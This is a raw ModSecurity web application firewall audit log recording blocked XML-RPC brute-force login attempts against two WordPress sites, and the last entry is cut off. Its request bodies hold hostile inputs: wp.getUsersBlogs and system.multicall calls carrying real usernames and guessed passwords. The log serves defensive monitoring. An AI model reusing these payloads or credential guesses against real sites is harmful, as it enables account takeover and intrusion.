--63c2c256-Z-- --5e40e105-A-- [05/Jun/2025:16:28:11 +0700] aEFjK1wdJdhOudw5hdz3ewAAAII 103.236.140.4 40330 103.236.140.4 8181 --5e40e105-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --5e40e105-C-- wp.getUsersBlogs wakahumas password1 --5e40e105-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5e40e105-E-- --5e40e105-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (54+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749115691455056 4256 (- - -) Stopwatch2: 1749115691455056 4256; combined=3251, p1=367, p2=2719, p3=0, p4=0, p5=96, sr=97, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5e40e105-Z-- --3b6cac53-A-- [05/Jun/2025:16:29:00 +0700] aEFjXH-K7ToMdu-YSIJQRgAAAAs 103.236.140.4 40480 103.236.140.4 8181 --3b6cac53-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 185.18.232.22 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 185.18.232.22 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --3b6cac53-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminantix@2021! --3b6cac53-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3b6cac53-E-- --3b6cac53-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 185.18.232.22 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749115740739602 5214 (- - -) Stopwatch2: 1749115740739602 5214; combined=3819, p1=452, p2=3197, p3=0, p4=0, p5=100, sr=96, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3b6cac53-Z-- --f83ecd08-A-- [05/Jun/2025:16:29:12 +0700] aEFjaFwdJdhOudw5hdz3qgAAAJA 103.236.140.4 40494 103.236.140.4 8181 --f83ecd08-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --f83ecd08-C-- wp.getUsersBlogs wakahumas zaq1xsw2 --f83ecd08-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f83ecd08-E-- --f83ecd08-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (66+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749115752325818 4472 (- - -) Stopwatch2: 1749115752325818 4472; combined=3365, p1=387, p2=2814, p3=0, p4=0, p5=95, sr=84, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f83ecd08-Z-- --8878b615-A-- [05/Jun/2025:16:29:40 +0700] aEFjhOth7G2xELALzPZR2gAAANc 103.236.140.4 40572 103.236.140.4 8181 --8878b615-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 54.78.115.243 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 54.78.115.243 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --8878b615-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminantix!23 --8878b615-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8878b615-E-- --8878b615-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 54.78.115.243 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749115780460877 5291 (- - -) Stopwatch2: 1749115780460877 5291; combined=3879, p1=477, p2=3237, p3=0, p4=0, p5=98, sr=93, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8878b615-Z-- --d5a5aa53-A-- [05/Jun/2025:16:30:13 +0700] aEFjpSrHpfaS2Cuwh8UCwQAAAFM 103.236.140.4 40642 103.236.140.4 8181 --d5a5aa53-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --d5a5aa53-C-- wp.getUsersBlogs wakahumas admin234 --d5a5aa53-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d5a5aa53-E-- --d5a5aa53-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (58+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749115813400277 4662 (- - -) Stopwatch2: 1749115813400277 4662; combined=3439, p1=384, p2=2879, p3=0, p4=0, p5=102, sr=84, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d5a5aa53-Z-- --8d196320-A-- [05/Jun/2025:16:30:16 +0700] aEFjqCrHpfaS2Cuwh8UCwgAAAFE 103.236.140.4 40660 103.236.140.4 8181 --8d196320-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 185.18.232.22 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 185.18.232.22 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --8d196320-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehRashed@321 --8d196320-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8d196320-E-- --8d196320-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 185.18.232.22 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749115816325097 4355 (- - -) Stopwatch2: 1749115816325097 4355; combined=3394, p1=379, p2=2850, p3=0, p4=0, p5=96, sr=78, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8d196320-Z-- --a0f31173-A-- [05/Jun/2025:16:31:13 +0700] aEFj4VwdJdhOudw5hdz33AAAAIc 103.236.140.4 40864 103.236.140.4 8181 --a0f31173-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --a0f31173-C-- wp.getUsersBlogs wakahumas 2003 --a0f31173-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a0f31173-E-- --a0f31173-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (82+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749115873492971 4344 (- - -) Stopwatch2: 1749115873492971 4344; combined=3326, p1=393, p2=2768, p3=0, p4=0, p5=96, sr=81, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a0f31173-Z-- --e8aa9552-A-- [05/Jun/2025:16:32:14 +0700] aEFkHn-K7ToMdu-YSIJQTwAAAAE 103.236.140.4 41086 103.236.140.4 8181 --e8aa9552-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --e8aa9552-C-- wp.getUsersBlogs wakahumas 1235698 --e8aa9552-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e8aa9552-E-- --e8aa9552-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (83+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749115934673712 5364 (- - -) Stopwatch2: 1749115934673712 5364; combined=3782, p1=501, p2=3110, p3=0, p4=0, p5=101, sr=107, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e8aa9552-Z-- --440dd011-A-- [05/Jun/2025:16:32:34 +0700] aEFkMirHpfaS2Cuwh8UDAgAAAEs 103.236.140.4 41142 103.236.140.4 8181 --440dd011-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 54.78.115.243 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 54.78.115.243 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --440dd011-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin1233 --440dd011-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --440dd011-E-- --440dd011-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 54.78.115.243 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749115954007909 4532 (- - -) Stopwatch2: 1749115954007909 4532; combined=3491, p1=410, p2=2911, p3=0, p4=0, p5=99, sr=81, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --440dd011-Z-- --80417f7e-A-- [05/Jun/2025:16:33:14 +0700] aEFkWn-K7ToMdu-YSIJQXgAAAAQ 103.236.140.4 41184 103.236.140.4 8181 --80417f7e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --80417f7e-C-- wp.getUsersBlogs wakahumas jessica --80417f7e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --80417f7e-E-- --80417f7e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (35+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749115994348767 4116 (- - -) Stopwatch2: 1749115994348767 4116; combined=3167, p1=340, p2=2654, p3=0, p4=0, p5=100, sr=79, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --80417f7e-Z-- --e7c7cb6f-A-- [05/Jun/2025:16:34:14 +0700] aEFkluth7G2xELALzPZSTAAAANc 103.236.140.4 41328 103.236.140.4 8181 --e7c7cb6f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --e7c7cb6f-C-- wp.getUsersBlogs wakahumas samantha --e7c7cb6f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e7c7cb6f-E-- --e7c7cb6f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (64+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749116054345206 4138 (- - -) Stopwatch2: 1749116054345206 4138; combined=3203, p1=353, p2=2685, p3=0, p4=0, p5=96, sr=80, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e7c7cb6f-Z-- --7a2e297c-A-- [05/Jun/2025:16:35:14 +0700] aEFk0uth7G2xELALzPZStAAAAMk 103.236.140.4 41544 103.236.140.4 8181 --7a2e297c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --7a2e297c-C-- wp.getUsersBlogs wakahumas anthony1 --7a2e297c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7a2e297c-E-- --7a2e297c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (98+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749116114378680 4281 (- - -) Stopwatch2: 1749116114378680 4281; combined=3294, p1=339, p2=2780, p3=0, p4=0, p5=101, sr=80, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7a2e297c-Z-- --a1f5e40b-A-- [05/Jun/2025:16:36:14 +0700] aEFlDuth7G2xELALzPZS2gAAAMw 103.236.140.4 41674 103.236.140.4 8181 --a1f5e40b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --a1f5e40b-C-- wp.getUsersBlogs wakahumas peaches --a1f5e40b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a1f5e40b-E-- --a1f5e40b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (57+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749116174446662 4307 (- - -) Stopwatch2: 1749116174446662 4307; combined=3376, p1=342, p2=2799, p3=0, p4=0, p5=137, sr=78, sw=98, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a1f5e40b-Z-- --d4dfc642-A-- [05/Jun/2025:16:37:14 +0700] aEFlSirHpfaS2Cuwh8UDFAAAAEk 103.236.140.4 41746 103.236.140.4 8181 --d4dfc642-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --d4dfc642-C-- wp.getUsersBlogs wakahumas liverpool1 --d4dfc642-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d4dfc642-E-- --d4dfc642-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (27+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749116234215521 4450 (- - -) Stopwatch2: 1749116234215521 4450; combined=3341, p1=337, p2=2812, p3=0, p4=0, p5=109, sr=78, sw=83, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d4dfc642-Z-- --32cae247-A-- [05/Jun/2025:16:38:15 +0700] aEFlhyrHpfaS2Cuwh8UDMAAAAEI 103.236.140.4 41944 103.236.140.4 8181 --32cae247-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --32cae247-C-- wp.getUsersBlogs wakahumas qwe --32cae247-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --32cae247-E-- --32cae247-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (84+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749116295039312 4935 (- - -) Stopwatch2: 1749116295039312 4935; combined=3753, p1=442, p2=3140, p3=0, p4=0, p5=101, sr=88, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --32cae247-Z-- --0e8d6335-A-- [05/Jun/2025:16:39:16 +0700] aEFlxCrHpfaS2Cuwh8UDNQAAAFM 103.236.140.4 42026 103.236.140.4 8181 --0e8d6335-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --0e8d6335-C-- wp.getUsersBlogs wakasarpras 12345 --0e8d6335-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0e8d6335-E-- --0e8d6335-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (27+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749116356271662 4402 (- - -) 